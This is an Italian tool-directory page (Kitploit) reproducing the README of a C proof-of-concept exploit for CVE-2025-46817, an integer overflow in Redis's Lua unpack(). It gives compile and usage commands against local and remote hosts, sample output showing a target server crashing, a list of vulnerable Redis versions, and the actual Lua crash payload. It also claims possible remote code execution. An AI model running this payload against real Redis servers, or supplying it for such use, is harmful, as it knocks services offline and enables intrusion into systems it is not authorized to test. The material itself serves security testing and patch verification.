Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-46817-PoC — Exploit basato su C per CVE-2025-46817, una vulnerabilità di integer overflow in Redis, che consente il rilevamento di crash e potenziale RCE tramite payload Lua unpack(). | Kitploit
Strumenti/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Analisi delle VulnerabilitàExploitFuzzingPenetration TestingSicurezza dei Database
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

Exploit basato su C per CVE-2025-46817, una vulnerabilità di integer overflow in Redis, che consente il rilevamento di crash e potenziale RCE tramite payload Lua unpack().

Vedi Repository
22611 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-46817 Exploit per Integer Overflow di Redis

Banner Language Platform

Un'implementazione leggera in C dell'exploit CVE-2025-46817 per la vulnerabilità di integer overflow in Redis.

🚀 Caratteristiche

  • Leggero: Singolo file C, nessuna dipendenza esterna oltre a hiredis
  • Veloce: Compilazione nativa per prestazioni massime
  • Output Colorato: Colori e icone del terminale accattivanti
  • Rilevamento Crash: Rileva automaticamente i crash del server
  • Controllo Versione: Identifica le versioni vulnerabili di Redis
  • Supporto Timeout: Timeout di connessione configurabili

📋 Requisiti

Ubuntu/Debian

sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

sudo yum install gcc hiredis-devel

macOS

brew install hiredis

🔧 Compilazione

gcc -o exploit exploit.c -lhiredis

🎯 Utilizzo

Utilizzo Base

./exploit -H 127.0.0.1 -P 6379

Target Remoto

./exploit -H 192.168.1.100 -P 6379 -t 5

Opzioni della Riga di Comando

-H <host>    Host del server Redis (obbligatorio)
-P <port>    Porta del server Redis (obbligatoria)  
-t <timeout> Timeout di connessione in secondi (predefinito: 10)
-h           Mostra il messaggio di aiuto

📊 Esempio di Output

 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    Strumento Exploit CVE-2025-46817
                   Integer Overflow -> Catena RCE
                   Accesso -> https://pwnbuffer.org/

    Autore: Slayerkkk
    Target: Redis <= 8.2.1
    Tipo: Corruzione Memoria -> Esecuzione Codice

ℹ️ Test della connessione a 127.0.0.1:6379...
✅ Connessione riuscita
ℹ️ Versione Redis: 8.2.1
❌ VULNERABILE - Versione <= 8.2.1
ℹ️ Test dello scripting Lua...
✅ Lua abilitato (1+1=2)

🚀 AVVIO DELLO SFRUTTAMENTO
==================================================
💀 Esecuzione del payload dell'exploit...
    Payload: Integer overflow tramite unpack()
💥 SERVER CRASHATO - Connessione persa!

📊 RISULTATO DELLO SFRUTTAMENTO
==============================
  💥 Stato: crashato (2.34s)

💀 SFRUTTAMENTO RIUSCITO - Server crashato!
   Vulnerabilità CVE-2025-46817 confermata

🛡️ Versioni Vulnerabili

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Dettagli Tecnici

Vulnerabilità

L'exploit sfrutta un integer overflow nell'implementazione della funzione Lua unpack() di Redis (luaB_unpack). Quando viene chiamata con parametri specifici, l'aritmetica degli interi con segno va in overflow, causando il tentativo di Redis di materializzare un numero enorme di valori di ritorno.

Payload dell'Exploit

local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Impatto

  • Crash del Server: Denial of service immediato
  • Corruzione della Memoria: Corruzione di heap/stack
  • Potenziale RCE: La corruzione della memoria potrebbe portare all'esecuzione di codice

🎯 Risultati del Rilevamento

Lo strumento riporta uno di questi stati:

  • ✅ sopravvissuto: Il server ha gestito il payload (probabilmente patchato)
  • 💥 crashato: Il server è crashato (vulnerabile)
  • ⚠️ timeout: Il server si è bloccato (probabilmente vulnerabile)
  • ❌ errore: Si è verificato un altro errore

🙏 Crediti

Autore: Slayerkkk
Sito Web: https://pwnbuffer.org

Scarica lo strumento